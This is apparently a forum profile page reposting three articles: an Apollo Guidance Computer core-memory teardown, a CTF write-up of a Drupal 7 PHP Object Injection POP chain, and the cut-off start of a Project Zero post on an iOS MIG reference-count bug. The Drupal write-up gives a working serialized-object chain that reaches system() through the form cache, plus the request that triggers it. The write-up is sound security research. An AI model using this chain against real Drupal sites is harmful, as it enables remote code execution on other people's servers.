Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    707

Everything posted by Nytro

  1. Inside the Apollo Guidance Computer's core memory The Apollo Guidance Computer (AGC) provided guidance, navigation and control onboard the Apollo flights to the Moon. This historic computer was one of the first to use integrated circuits, containing just two types of ICs: a 3-input NOR gate for the logic circuitry and a sense amplifier IC for the memory. It also used numerous analog circuits built from discrete components using unusual cordwood construction. The Apollo Guidance Computer. The empty space on the left held the core rope modules. The connectors on the right communicate between the AGC and the spacecraft. We1 are restoring the AGC shown above. It is a compact metal box with a volume of 1 cubic foot and weighs about 70 pounds. The AGC had very little memory by modern standards: 2048 words of RAM in erasable core memory and 36,864 words of ROM in core rope memory. (In this blog post, I'll discuss just the erasable core memory.) The core rope ROM modules (which we don't have)2 would be installed in the empty space on the left. On the right of the AGC, you can see the two connectors that connected the AGC to other parts of the spacecraft, including the DSKY (Display/Keyboard).3 By removing the bolts holding the two trays together, we could disassemble the AGC. Pulling the two halves apart takes a surprising amount of force because of the three connectors in the middle that join the two trays. The tray on the left is the "A" tray, which holds the logic and interface modules. The tangles of wire on the left of the tray are the switching power supplies that convert 28 volts from the spacecraft to 4 and 14 volts for use in the AGC. The tray on the right is the "B" tray, which holds the memory circuitry, oscillator and alarm. The core memory module was removed in this picture; it goes in the empty slot in the middle of the B tray. The AGC is implemented with dozens of modules in two trays. The trays are connected through the three connectors in the middle. Core memory overview Core memory was the dominant form of computer storage from the 1950s until it was replaced by semiconductor memory chips in the early 1970s. Core memory was built from tiny ferrite rings called cores, storing one bit in each core. Cores were arranged in a grid or plane, as in the highly-magnified picture below. Each plane stored one bit of a word, so a 16-bit computer would use a stack of 16 core planes. Each core typically had 4 wires passing through it: X and Y wires in a grid to select the core, a diagonal sense line through all the cores for reading, and a horizontal inhibit line for writing.4 Closeup of a core memory (not AGC). Photo by Jud McCranie (CC BY-SA 4.0). Each core stored a bit by being magnetized either clockwise or counterclockwise. A current in a wire through the core could magnetize the core with the magnetization direction matching the current's direction. To read the value of a core, the core was flipped to the 0 state. If the core was in 1 state previously, the changing magnetic field produced a voltage in the sense wire threaded through the cores. But if the core was in the 0 state to start, the sense line wouldn't pick up a voltage. Thus, forcing a core to 0 revealed the core's previous state (but erased it in the process). A key property of the cores was hysteresis: a small current had no effect on a core; the current had to be above a threshold to flip the core. This was very important because it allowed a grid of X and Y lines to select one core from the grid. By energizing one X line and one Y line each with half the necessary current, only the core where both lines crossed would get enough current to flip and other cores would be unaffected. This "coincident-current" technique made core memory practical since a few X and Y drivers could control a large core plane. The AGC's erasable core memory system The AGC used multiple modules in the B tray to implement core memory. The Erasable Memory module (B12) contained the actual cores, 32768 cores to support 2048 words; each word was 15 bits plus a parity bit. Several more modules contained the supporting circuitry for the memory.5 The remainder of this article will describe these modules. The erasable memory module in the Apollo Guidance Computer, with the supporting modules next to it. Image courtesy of Mike Stewart. The photo below shows the Erasable Memory module after removing it from the tray. Unlike the other modules, this module has a black metal cover. Internally, the cores are encapsulated in Silastic (silicone rubber), which is then encapsulated in epoxy. This was intended to protect the delicate cores inside, but it took NASA a couple tries to get the encapsulation right. Early modules (including ours) were susceptible to wire breakages from vibrations. At the bottom of the modules are the gold-plated pins that plug into the backplane. The erasable core memory module from the Apollo Guidance Computer. Core memory used planes of cores, one plane for each bit in the word. The AGC had 16 planes (which were called mats), each holding 2048 bits in a 64×32 grid. Note that each mat consists of eight 16×16 squares. The diagram below shows the wiring of the single sense line through a mat. The X/Y lines were wired horizontally and vertically. The inhibit line passed through all the cores in the mat; unlike the diagonal sense line it ran vertically. The sense line wiring in an AGC core plane (mat). The 2048 cores are in a 64×32 grid. Most computers physically stacked the core planes on top of each other but the AGC used a different mechanical structure, folding the mats (planes) to fit compactly in the module. The mats were accordion-folded to fit tightly into the module as shown in the diagram below. (Each of the 16 mats is outlined in cyan.) When folded, the mats formed a block (oriented vertically in the diagram below) that was mounted horizontally in the core module. This folding diagram shows how 16 mats are folded into the core module. (Each cyan rectangle indicates a mat.) The photo below shows the memory module with the cover removed. (This is a module on display at the CHM, not our module.) Most of the module is potted with epoxy, so the cores are not visible. The most noticeable feature is the L-shaped wires on top. These connect the X and Y pins to 192 diodes. (The purpose of the diode will be explained later.) The diodes are hidden underneath this wiring in two layers, mounted horizontally cordwood-style. The leads from the diodes are visible as they emerge and connect to terminals on top of the black epoxy. The AGC's memory module with the cover removed. This module is on display at the CHM. Photo courtesy of Mike Stewart. Marc took X-rays of the module and I stitched the photos together (below) to form an image looking down into the module. The four rows of core mats in the folding diagram correspond to the four dark blocks. You can also see the two rows of diodes as two darker horizontal stripes. At this resolution, the wires through the cores and the tangled mess of wires to the pins are not visible; these wires are very thin 38-gauge wires, much thinner than the wires to the diodes. Composite X-ray image of the core memory module. The stitching isn't perfect in the image because the parallax and perspective changed in each image. In particular, the pins appear skewed in different directions. The diagram below shows a cross-section of the memory module. (The front of the module above corresponds to the right side of the diagram.) The diagram shows how the two layers of diodes (blue) are arranged at the top, and are wired (red) to the core stack (green) through the "feed thru". Also note how the pins (yellow) at the bottom of the module rise up through the epoxy and are connected by wires (red) to the core stack. Cross-section of memory module showing internal wiring. From Apollo Computer Design Review page 9-39 (Original block II design.) Addressing a memory location The AGC's core memory holds 2048 words in a 64×32 matrix. To select a word, one of the 64 X select lines is energized along with one of the 32 Y select lines. One of the challenges of a core memory system is driving the X and Y select lines. These lines need to be driven at high current (100's of milliamps). In addition, the read and write currents are opposite directions, so the lines need bidirectional drivers. Finally, the number of X and Y lines is fairly large (64 + 32 for the AGC), so using a complex driver circuit on each line would be too bulky and expensive. In this section, I'll describe the circuitry in the AGC that energizes the right select lines for a particular address. The AGC uses a clever trick to minimize the hardware required to drive the X and Y select lines. Instead of using 64 X line drivers, the AGC has 8 X drivers at the top of the matrix, and 8 at the bottom of the matrix. Each of the 64 select lines is connected to a different top and bottom driver pair. Thus, energizing a top driver and a bottom driver produces current through a single X select line. Thus, only 8+8 X drivers are required rather than 64.6 The Y drivers are similar, using 4 on one side and 8 on the other. The downside of this approach is 192 diodes are required to prevent "sneak paths" through multiple select lines.7 Illustration of how "top" and "bottom" drivers work together to select a single line through the core matrix. Original diagram here. The diagram above demonstrates this technique for the vertical lines in a hypothetical 9×5 core array. There are three "top" drivers (A, B and C), and three "bottom" drivers (1, 2 and 3). If driver B is energized positive and driver 1 is energized negative, current flows through the core line highlighted in red. Reversing the polarity of the drivers reverses the current flow, and energizing different drivers selects a different line. To see the need for diodes, note that in the diagram above, current could flow from B to 2, up to A and finally down to 1, for instance, incorrectly energizing multiple lines. The address decoder logic is in tray "A" of the AGC, implemented in several logic modules.9 The AGC's logic is entirely built from 3-input NOR gates (two per integrated circuit), and the address decoder is no exception. The image below shows logic module A14. (The other logic modules look essentially the same, but the internal printed circuit board is wired differently.) The logic modules all have a similar design: two rows of 30 ICs on each side, for 120 ICs in total, or 240 3-input NOR gates. (Module A14 has one blank location on each side, for 118 ICs in total.) The logic module plugs into the AGC via the four rows of pins at the bottom.10 Much of the address decoding is implemented in logic module A14. Photo courtesy of Mike Stewart. The diagram below shows the circuit to generate one of the select signals (XB6—X bottom 6).11 The NOR gate outputs a 1 if the inputs are 110 (i.e. 6). The other select signals are generated with similar circuits, using different address bits as inputs. This address decode circuit generates one of the select signals. The AGC has 28 decode circuits similar to this. Each integrated circuit implemented two NOR gates using RTL (resistor-transistor logic), an early logic family. These ICs were costly; they cost $20-$30 each (around $150 in current dollars). There wasn't much inside each IC, just three transistors and eight resistors. Even so, the ICs provided a density improvement over the planned core-transistor logic, making the AGC possible. The decision to use ICs in the AGC was made in 1962, amazingly just four years after the IC was invented. The AGC was the largest consumer of ICs from 1962 to 1965 and ended up being a major driver of the integrated circuit industry. Each IC contains two NOR gates implemented with resistor-transistor logic. From Schematic 2005011. The die photo below shows the internal structure of the NOR gate; the metal layer of the silicon chip is most visible.12 The top half is one NOR gate and the bottom half is the other. The metal wires connect the die to the 10-pin package. The transistors are clumped together in the middle of the chip, surrounded by the resistors. Die photo of the dual 3-input NOR gate used in the AGC. Pins are numbered counterclockwise; pin 3 is to the right of the "P". Photo by Lisa Young, Smithsonian. Erasable Driver Modules Next, the Erasable Driver module converts the 4-volt logic-level signals from the address decoder into 14-volt pulses with controlled current. The AGC has two identical Erasable Driver modules, in slots B9 and B10.5 Two modules are required due to the large number of signals: 28 select lines (X and Y, top and bottom), 16 inhibit lines (one for each bit), and a dozen control signals. The select line driver circuits are simple transistor switching circuits: a transistor and two resistors. Other circuits, such as the inhibit line drivers are a bit more complex because the shape and current of the pulse need to be carefully matched to the core module. This circuit uses three transistors, an inductor, and a handful of resistors and diodes. The resistor values are carefully selected during manufacturing to provide the desired current. The erasable driver module, front and back. Photo courtesy of Mike Stewart. This module, like the other non-logic modules, is built using cordwood construction. In this high-density construction, components were inserted into holes in the module, passing through from one side of the module to the other, with their leads exiting on either side. (Except for transistors, with all three leads on the same side.) On each side of the module, point-to-point wiring connected the components with welded connections. In the photo below, note the transistors (golden, labeled with Q), resistors (R), diodes (CR for crystal rectifier, with K indicating the cathode), large capacitors (C), inductor (L), and feed-throughs (FT). A plastic sheet over the components conveniently labels them; for instance, "7Q1" means transistor Q1 for circuit 7 (of a repeated circuit). These labels match the designations on the schematic. At the bottom are connections to the module pins. Modules that were flown on spacecraft were potted with epoxy so the components were protected against vibration. Fortunately, our AGC was used on the ground and left mostly unpotted, so the components are visible. A closeup of the Erasable Driver module, showing the cordwood construction. Photo courtesy of Mike Stewart. Current Switch Module You might expect that the 14-volt pulses from the Erasable Driver modules would drive the X and Y lines in the core. However, the signals go through one more module, the Current Switch module, in slot B11 just above the core memory module. This module generates the bidirectional pulses necessary for the X and Y lines. The driver circuits are very interesting as each driver includes a switching core in the circuit. (These cores are much larger than the cores in the memory itself.)13 The driver uses two transistors: one for the read current, and the other for the write current in the opposite direction. The switching core acts kind of like an isolation transformer, providing the drive signal to the transistors. But the switching core also "remembers" which line is being used. During the read phase, the address decoder flips one of the cores. This generates a pulse that drives the transistor. During the write phase, the address decoder is not involved. Instead, a "reset" signal is sent through all the driver cores. Only the core that was flipped in the previous phase will flip back, generating a pulse that drives the other transistor. Thus, the driver core provides memory of which line is active, avoiding the need for a flip flop or other latch. The current switch module. (This is from the CHM as ours is encapsulated and there's nothing to see but black epoxy.) Photo courtesy of Mike Stewart. The diagram below shows the schematic of one of the current switches. The heart of the circuit is the switching core. If the driver input is 1, winding A will flip the the core when the set strobe is pulsed. This will produce a pulses on the other windings; the positive pulse on winding B will turn on transistor Q55, pulling the output X line low for reading.14 The output is connected via eight diodes to eight X top lines through the core. A similar bottom select switch (without diodes) will pull X bottom lines high; the single X line with the top low and the bottom high will be energized, selecting that row. For a write, the reset line is pulled low energizing winding D. If the core had flipped earlier, it will flip back, generating a pulse on winding C that will turn on transistor Q56, and pull the output high. But if the core had not flipped earlier, nothing happens and the output remains inactive. As before, one X line and one Y line through the core planes will be selected, but this time the current is in the opposite direction for a write. Schematic of one of the current switches in the AGC. This switch is the driver for X top line 0. The schematic shows one of the 8 pairs of diodes connected to this driver. The photo below shows one of the current switch circuits and its cordwood construction. The switching core is the 8-pin black module between the transistors. The core and the wires wound through it are encapsulated with epoxy, so there's not much to see. At the bottom of the photo, you can see the Malco Mini-Wasp pins that connect the module to the backplane. Closeup of one switch circuit in the Current Switch Module. The switching core (center) has transistors on either side. Sense Amplifier Modules When a core flips, the changing magnetic field induces a weak signal in the corresponding sense line. There are 16 sense lines, one for each bit in the word. The 16 sense amplifiers receive these signals, amplify them, and convert them to logic levels. The sense amplifiers are implemented using a special sense amplifier IC. (The AGC used only two different ICs, the sense amplifier and the NOR gate.) The AGC has two identical sense amplifier modules, in slots B13 and B14; module B13 is used by the erasable core memory, while B14 is used by the fixed memory (i.e. core rope used for ROM). The signal from the core first goes through an isolation transformer. It is then amplified by the IC and the output is gated by a strobe transistor. The sense amplifier depends on carefully-controlled voltage levels for bias and thresholds. These voltages are produced by voltage regulators on the sense amplifier modules that use Zener diodes for regulation. The voltage levels are tuned during manufacturing by selecting resistor values and optional diodes, matching each sense amplifier module to the characteristics of the computer's core memory module. The photo below shows one of the sense amp modules. The eight repeated units are eight sense amplifiers; the eight other sense amplifiers are on the other side of the module. The reddish circles are the pulse transformers, while the lower circles are the sense amplifier ICs. The voltage regulation is in the middle and right of the module. On top of the module (front in the photo) you can see the horizontal lines of the nickel ribbon that connects the circuits; it is somewhat similar to a printed circuit board. Sense amplifier module with top removed. Note the nickel ribbon interconnect at the top of the module. The photo below shows a closeup of the module. At the top are two amplifier integrated circuits in metal cans. Below are two reddish pulse transformers. An output driver transistor is between the pulse transformers.15 The resistors and capacitors are mounted using cordwood construction, so one end of the component is wired on this side of the module, and one on the other side. Note the row of connections at the top of the module; these connect to the nickel ribbon interconnect. Closeup of the sense amplifier module for the AGC. The sense amplifier integrated circuits are at the top and the reddish pulse transformers are below. The pins are at the bottom and the wires at the top go to the nickel ribbon, which is like a printed circuit board. The diagram below shows the circuitry inside each sense amp integrated circuit. The sense amp chip is considerably more complex than the NOR gate IC. The chip receives the sense amp signal inputs from the pulse transformer and the differential amplifier amplifies the signal.16 If the signal exceeds a threshold, the IC outputs a 1 bit when clocked by the strobe. Circuitry inside the sense amp integrated circuit for the AGC. Writes With core memory, the read operation and write operation are always done in pairs. Since a word is erased when it is read, it must then be written, either with the original value or a new value. In the write cycle, the X and Y select lines are energized to flip the core to 1, using the opposite current from the read cycle. Since the same X and Y select lines go through all the planes, all bits in the word would be set to 1. To store a 0 bit, each plane has an inhibit line that goes through all the cores in the plane. Energizing the inhibit line in the opposite direction to the X and Y select lines partially cancels out the current and prevents the core from receiving enough current to flip it, so the bit remains 0. Thus, by energizing the appropriate inhibit lines, any value can be written to the word in core. The 16 inhibit lines are driven by the Erasable Driver modules. The broken wire During the restoration, we tested the continuity of all the lines through the core module. Unfortunately, we discovered that the inhibit line for bit 16 is broken internally. NASA discovered in early testing that wires could be sheared inside the module, due to vibrations between the silicone encapsulation and the epoxy encapsulation. They fixed this problem in the later modules that were flown, but our module had the original faulty design. We attempted to find the location of the broken wire with X-rays, but couldn't spot the break. Time-domain reflectometry suggests the break is inconveniently located in the middle of the core planes. We are currently investigating options to deal with this. Marc has a series of AGC videos; the video below provides detail on the broken wire in the memory module. Conclusion Core memory was the best storage technology in the 1960s and the Apollo Guidance Computer used it to get to the Moon. In addition to the core memory module itself, the AGC required several modules of supporting circuitry. The AGC's logic circuits used early NOR-gate integrated circuits, while the analog circuits were built from discrete components and sense amplifier ICs using cordwood construction. The erasable core memory in the AGC stored just 2K words. Because each bit in core memory required a separate physical ferrite core, density was limited. Once semiconductor memory became practical in the 1970s, it rapidly replaced core memory. The image below shows the amazing density difference between semiconductor memory and core memory: 64 bits of core take about the same space as 64 gigabytes of flash. Core memory from the IBM 1401 compared with modern flash memory. I announce my latest blog posts on Twitter, so follow me @kenshirriff for future articles. I also have an RSS feed. See the footnotes for Apollo manuals17 and more information sources18. Thanks to Mike Stewart for supplying images and extensive information. Notes and references The AGC restoration team consists of Mike Stewart (creator of FPGA AGC), Carl Claunch, Marc Verdiell (CuriousMarc) on YouTube and myself. The AGC that we're restoring belongs to a private owner who picked it up at a scrap yard in the 1970s after NASA scrapped it. For simplicity I refer to the AGC we're restoring as "our AGC". The Apollo flights had one AGC in the command module (the capsule that returned to Earth) and one AGC in the lunar module. In 1968, before the Moon missions, NASA tested a lunar module (with astronauts aboard) in a giant vacuum chamber in Houston to ensure that everything worked in space-like conditions. We believe our AGC was installed in that lunar module (LTA-8). Since this AGC was never flown, most of the modules are not potted with epoxy. ↩ We don't have core rope modules, but we have a core rope simulator from the 1970s. Yes, we know about Francois; those are ropes for the earlier Block I Apollo Guidance Computer and are not compatible with our Block II AGC. ↩ Many people have asked if we talked to Fran about the DSKY. Yes, we have. ↩ There were alternative ways to wire a core plane. Using a diagonal sense wire reduced the noise in the sense wire from X and Y pulses but some used a horizontal sense wire. Some core systems used the same wire for sense and inhibit (which simplified manufacturing), but that made noise rejection more complex. ↩ If you look carefully at the pictures of modules installed in the AGC, the Erasable Driver module in B10 is upside down. This is not a mistake, but how the system was designed. I assume this simplified the backplane wiring somehow, but it looks very strange. ↩ The IBM 1401 business computer, for example, used a different approach to generate the X and Y select lines. To generate the 50 X select signals, it used a 5×10 matrix of cores (separate from the actual memory cores). Two signals into the matrix were energized at the same time, flipping one of the 50 cores and generating a pulse on that line. Thus, only 5+10 drivers were needed instead of 50. The Y select signals were similar, using an 8×10 matrix. Details here. ↩ The AGC core memory required 192 diodes to prevent sneak paths, where a pulse could go backward through the wrong select lines. Each line required two diodes since the lines are driven one direction for read and the opposite for write. Since there are 64 X lines and 32 Y lines, 2×(64+32) = 192 diodes were required. These diodes were installed in two layers in the top of the core memory module. ↩ The memory address is mapped onto the select lines as follows. The eight X bottom signals are generated from the lowest address bits, S01, S02 and S03. (Bits in a word are numbered starting at 1, not 0.) Each decoder output has as NOR gate to select a particular bit pattern, along with four more NOR gates as buffers. The eight X top signals are generated from address bits S04, S05, and S06. The four Y bottom signals are generated from address bits S07 and S08. The eight Y top signals are generated from address bits EAD09, EAD10, and EAD11; these in turn were generated from S09 and S10 along with bank select bits EB9, EB10 and EB11. (The AGC used 12-bit addresses, allowing 4096 words to be addressed directly. Since the AGC had 38K of memory in total, it had a complex memory bank system to access the larger memory space.) ↩ For address decoding, the X drivers were in module A14, the Y top drivers were in A7 and the Y bottom drivers in A14. The memory address was held in the memory address register (S register) in module A12, which also held a bit of decoding logic. Module A14 also held some memory timing logic. In general, the AGC's logic circuits weren't cleanly partitioned across modules since making everything fit was more important than a nice design. ↩ One unusual thing to notice about the AGC's logic circuitry is there are no bypass capacitors. Most integrated circuit logic has a bypass capacitor next to each IC to reduce noise, but NASA found that the AGC worked better without bypass capacitors. ↩ The "Blue-nose" gate doesn't have the pull-up resistor connected, making it open collector. It is presumably named after its blue appearance on blueprints. Blue-nose outputs can be connected together to form a NOR gate with more inputs. In the case of the address decoder, the internal pull-up resistor is not used so the Erasable Driver module (B9/B10) can pull the signal up to BPLUS (+14V) rather than the +4V logic level. ↩ The AGC project used integrated circuits from multiple suppliers, so die photos from different sources show different layouts. ↩ The memory cores and the switching core were physically very different. The cores in the memory module had a radius between 0.047 and 0.051 inches (about 1.2mm). The switching cores were much larger (either .249" or .187" depending on the part number) and had 20 to 50 turns of wire through them. ↩ For some reason, the inputs to the current switches are numbered starting at 0 (XT0E-XT7E) while the outputs are numbered starting at 1 (1AXBF-8AXBF). Just in case you try to understand the schematics. ↩ The output from the sense amplifiers is a bit confusing because the erasable core memory (RAM) and fixed rope core memory (ROM) outputs are wired together. The RAM has one sense amp module with 16 amplifiers in slot B13, and the ROM has its own identical sense amp module in slot B14. However, each module only has 8 output transistors. The two modules are wired together so 8 output bits are driven by transistors in the RAM's sense amp module and 8 output bits are driven by transistors in the ROM's sense amp module. (The motivation behind this is to use identical sense amp modules for RAM and ROM, but only needing 16 output transistors in total. Thus, the transistors are split up 8 to a module.) ↩ I'll give a bit more detail on the sense amps here. The key challenge with the sense amps is that the signal from a flipping core is small and there are multiple sources of noise that the sense line can pick up. By using a differential signal (i.e. looking at the difference between the two inputs), noise that is picked up by both ends of the sense line (common-mode noise) can be rejected. The differential transformer improved the common-mode noise rejection by a factor of 30. (See page 9-16 of the Design Review.) The other factor is that the sense line goes through some cores in the same direction as the select lines, and through some cores the opposite direction. This helps cancel out noise from the select lines. However, the consequence is that the pulse on the sense line may be positive or may be negative. Thus, the sense amp needed to handle pulses of either polarity; the threshold stage converted the bipolar signal to a binary output. ↩ The Apollo manuals provide detailed information on the memory system. The manual has a block diagram of the AGC's memory system. The address decoder is discussed in the manual starting at 4-416 and schematics are here. Schematics of the Erasable Driver modules are here and here; the circuit is discussed in section 4-5.8.3.3 of the manual. Schematics of the Current Switch module are here and here; the circuit is discussed in section 4-5.8.3.3 of the manual. Sense amplifiers are discussed in section 4-5.8.3.4 of the manual with schematics here and here; schematics are here and here. ↩ For more information on the AGC, the Virtual AGC site has tons of information on the AGC, in particular the ElectroMechanical page has lots of schematics and drawings. There's a video of Eldon Hall, designer of the AGC, disassembling our AGC in 2004. If you want to try a simulated AGC in your browser, see moonjs. Eldon Hall's book Journey to the Moon: The History of the Apollo Guidance Computer is very interesting. Also see Sunburst and Luminary: An Apollo Memoir by Don Eyles, who wrote a lot of the lunar landing code and discusses the famous program alarms. The Apollo Guidance Computer: Architecture and Operation is unevenly written and has errors, but the discussion in the last half of space navigation and a lunar mission is informative. ↩ Sursa: http://www.righto.com/2019/01/inside-apollo-guidance-computers-core.html
  2. CTF Writeup: Complex Drupal POP Chain 29 Jan 2019 by Simon Scannell A recent Capture-The-Flag tournament hosted by Insomni’hack challenged participants to craft an attack payload for Drupal 7. This blog post will demonstrate our solution for a PHP Object Injection with a complex POP gadget chain. About the Challenge The Droops challenge consisted of a website which had a modified version of Drupal 7.63 installed. The creators of the challenge added a Cookie to the Drupal installation that contained a PHP serialized string, which would then be unserialized on the remote server, leading to a PHP Object Injection vulnerability. Finding the cookie was straightforward and the challenge was obvious: Finding and crafting a POP chain for Drupal. If you are not familiar with PHP Object Injections we recommend reading our blog post about the basics of PHP Object Injections. Drupal POP Chain to Drupalgeddon 2 We found the following POP chain in the Drupal source code that affects its cache mechanism. Through the POP chain it was possible to inject into the Drupal cache and abuse the same feature that lead to the Drupalgeddon 2 vulnerability. No knowledge of this vulnerability is required to read this blog post, as each relevant step will be explained. The POP chain is a second-order Remote Code Execution, which means that it consists of two steps: Injecting into the database cache the rendering engine uses Exploiting the rendering engine and Drupalgeddon 2 Injecting into the cache The DrupalCacheArray class in includes/bootstrap.inc implements a destructor and writes some data to the database cache with the method set(). This is our entry point of our gadget chain. 1 2 3 4 5 6 7 8 91011121314 /** * Destructs the DrupalCacheArray object. */ public function __destruct() { $data = array(); foreach ($this->keysToPersist as $offset => $persist) { if ($persist) { $data[$offset] = $this->storage[$offset]; } } if (!empty($data)) { $this->set($data); } } The set() method will essentially call Drupal’s cache_set() function with $this->cid, $data, and $this->bin, which are all under control of the attacker since they are properties of the injected object. We assumed that we are now able to inject arbitrary data into the Drupal cache. 1 2 3 4 5 6 7 8 91011121314 protected function set($data, $lock = TRUE) { // Lock cache writes to help avoid stampedes. // To implement locking for cache misses, override __construct(). $lock_name = $this->cid . ':' . $this->bin; if (!$lock || lock_acquire($lock_name)) { if ($cached = cache_get($this->cid, $this->bin)) { $data = $cached->data + $data; } cache_set($this->cid, $data, $this->bin); if ($lock) { lock_release($lock_name); } } } In order to find out if this assumption was true, we started digging into the internals of the Drupal cache. We found out that the cache entries are stored in the database. Each cache type has its own table. (A cache for forms, one for pages and so on.) 1 2 3 4 5 6 7 8 910111213141516 MariaDB [drupal7]> SHOW TABLES; +-----------------------------+ | Tables_in_drupal7 | +-----------------------------+ ... | cache | | cache_block | | cache_bootstrap | | cache_field | | cache_filter | | cache_form | | cache_image | | cache_menu | | cache_page | | cache_path | ... After a bit more of digging around, we discovered that the table name is the equivalent to $this->bin. This means we can set bin to be of any cache type and inject into any cache table. But what can we do with this? The next step was to analyze the different cache tables for interesting entries and their structure. 1 2 3 4 5 6 7 8 910 MariaDB [drupal7]> DESC cache_form; +------------+--------------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +------------+--------------+------+-----+---------+-------+ | cid | varchar(255) | NO | PRI | | | | data | longblob | YES | | NULL | | | expire | int(11) | NO | MUL | 0 | | | created | int(11) | NO | | 0 | | | serialized | smallint(6) | NO | | 0 | | +------------+--------------+------+-----+---------+-------+ For example the cache_form table has a column called cid. As a reminder, one of the arguments to cache_set() was $this->cid. We assumed the following: $this->cid maps to the cid column of the cache table, which is set in $this->bin. cid is the key of a cache entry and the data column simply is the $data parameter in cache_set(). To verify all these assumptions we created a serialized payload locally by creating a class in a build.php file and unserialized it on my test Drupal setup: 1 2 3 4 5 6 7 8 910111213 class SchemaCache { // Insert an entry with some cache_key protected $cid = "some_cache_key"; // Insert it into the cache_form table protected $bin = "cache_form"; protected $keysToPersist = array('input_data' => true); protected $storage = array('input_data' => array("arbitrary data!")); } $schema = new SchemaCache(); echo serialize($schema); The reason we used the SchemaCache class here is because it extends the abstract class DrupalCacheArray, which means it can’t be instantiated on its own. The deserialization of this data lead to the following entry in the cache_form table being created: 123456 MariaDB [drupal7]> SELECT * FROM cache_form; +----------------+-----------------------------------------------------------+--------+------------+------------+ | cid | data | expire | created | serialized | +----------------+-----------------------------------------------------------+--------+------------+------------+ | some_cache_key | a:1:{s:10:"input_data";a:1:{i:0;s:15:"arbitrary data!";}} | 0 | 1548684864 | 1 | +----------------+-----------------------------------------------------------+--------+------------+------------+ Using the injected cached data to gain Remote Code Execution Since we were now able to inject arbitrary data into any caching table, we started to search for ways in which the cache was used by Drupal that could be used to gain Remote Code Execution. After a bit of searching, we stumbled upon the following ajax callback, which can be triggered by making a request to the URL: http://drupalurl.org/?q=system/ajax. 1234 function ajax_form_callback() { list($form, $form_state, $form_id, $form_build_id, $commands) = ajax_get_form(); drupal_process_form($form['#form_id'], $form, $form_state); } The ajax_get_form() function internally uses cache_get() to retrieve a cached entry from the cache_form table: 12345 if ($cached = cache_get('form_' . $form_build_id, 'cache_form')) { $form = $cached->data; ... return $form; } This is interesting because this means it is possible to pass an arbitrary form render array to drupal_process_form(). As previously mentioned, the Drupalgeddon 2 vulnerability abused this feature, so chances were high that code execution could be achieved with the ability to inject arbitrary render arrays into the rendering engine. Within drupal_process_form(), we found the following lines of code: 1234 if (isset($element['#process']) && !$element['#processed']) { foreach ($element['#process'] as $process) { $element = $process($element, $form_state, $form_state['complete form']); } Here, $element refers to the $form received via cache_get(), meaning the keys and values of the array can be set arbitrarily. This means it is possible to simply set an arbitrary process (#process) callback and execute it with the render array as a parameter. Since the first argument is an array, it is not possible to simply call a function such as system() directly. What is required is a function that takes an array as input that leads to RCE. The drupal_process_attached() function seemed very promising: 1 2 3 4 5 6 7 8 91011 function drupal_process_attached($elements, $group = JS_DEFAULT, $dependency_check = FALSE, $every_page = NULL) { ... foreach ($elements['#attached'] as $callback => $options) { if (function_exists($callback)) { foreach ($elements['#attached'][$callback] as $args) { call_user_func_array($callback, $args); } } } return $success; Since all array keys and values can be set arbitrarily, is is possible to call an arbitrary function with arbitrary arguments via call_user_func_array(), which leads to RCE! This means the final POP chain looks like this: 1 2 3 4 5 6 7 8 9101112131415161718192021222324252627 <?php class SchemaCache { // Insert an entry with some cache_key protected $cid = "form_1337"; // Insert it into the cache_form table protected $bin = "cache_form"; protected $keysToPersist = array( '#form_id' => true, '#process' => true, '#attached' => true ); protected $storage = array( '#form_id' => 1337, '#process' => array('drupal_process_attached'), '#attached' => array( 'system' => array(array('sleep 20')) ) ); } $schema = new SchemaCache(); echo serialize($schema); All that is left to do is to trigger the PHP Object Injection vulnerability with the resulting serialized string and then to make a POST request to http://drupalurl.org/?q=system/ajax and set the POST parameter form_build_id to 1337 to trigger the RCE. Conclusion POP chains can often become more complex and require a deeper knowledge of the application. However, the purpose of this blog post was to demonstrate that exploitation is still possible, even if no obvious, first order POP chain exists. If we had not known that the rendering API of drupal uses a lot of callbacks and had vulnerabilities in the past, we probably would not have found this particular POP chain. Alternatively, deep PHP knowledge can also lead to working POP chains when no obvious POP chain can be found. There exists another POP chain, an Object Instantion to Blind XXE to File Read to SQL Injection to RCE. A write up for this POP chain was written by Paul Axe and can be found here. We also would like to thank the creators for creating this and the other amazing challenges for the Insomni’hack CTF 2019. Tags: simon scannell, php, writeup, php object injection, Author: Simon Scannell Security Researcher Simon is a self taught security researcher at RIPS Technologies and is passionate about web application security and coming up with new ways to find and exploit vulnerabilities. He currently focuses on the analysis of popular content management systems and their security architecture. Sursa: https://blog.ripstech.com/2019/complex-drupal-pop-chain/
  3. Tuesday, January 29, 2019 voucher_swap: Exploiting MIG reference counting in iOS 12 Posted by Brandon Azad, Project Zero In this post I'll describe how I discovered and exploited CVE-2019-6225, a MIG reference counting vulnerability in XNU's task_swap_mach_voucher() function. We'll see how to exploit this bug on iOS 12.1.2 to build a fake kernel task port, giving us the ability to read and write arbitrary kernel memory. (This bug was independently discovered by @S0rryMybad.) In a later post, we'll look at how to use this bug as a starting point to analyze and bypass Apple's implementation of ARMv8.3 Pointer Authentication (PAC) on A12 devices like the iPhone XS. A curious discovery MIG is a tool that generates Mach message parsing code, and vulnerabilities resulting from violating MIG semantics are nothing new: for example, Ian Beer's async_wake exploited an issue where IOSurfaceRootUserClient would over-deallocate a Mach port managed by MIG semantics on iOS 11.1.2. Most prior MIG-related issues have been the result of MIG service routines not obeying semantics around object lifetimes and ownership. Usually, the MIG ownership rules are expressed as follows: If a MIG service routine returns success, then it took ownership of all resources passed in. If a MIG service routine returns failure, then it took ownership of none of the resources passed in. Unfortunately, as we'll see, this description doesn't cover the full complexity of kernel objects managed by MIG, which can lead to unexpected bugs. The journey started while investigating a reference count overflow in semaphore_destroy(), in which an error path through the function left the semaphore_t object with an additional reference. While looking at the autogenerated MIG function _Xsemaphore_destroy() that wraps semaphore_destroy(), I noticed that this function seems to obey non-conventional semantics. Here's the relevant code from _Xsemaphore_destroy(): task = convert_port_to_task(In0P->Head.msgh_request_port); OutP->RetCode = semaphore_destroy(task, convert_port_to_semaphore(In0P->semaphore.name)); task_deallocate(task); #if __MigKernelSpecificCode if (OutP->RetCode != KERN_SUCCESS) { MIG_RETURN_ERROR(OutP, OutP->RetCode); } if (IP_VALID((ipc_port_t)In0P->semaphore.name)) ipc_port_release_send((ipc_port_t)In0P->semaphore.name); #endif /* __MigKernelSpecificCode */ The function convert_port_to_semaphore() takes a Mach port and produces a reference on the underlying semaphore object without 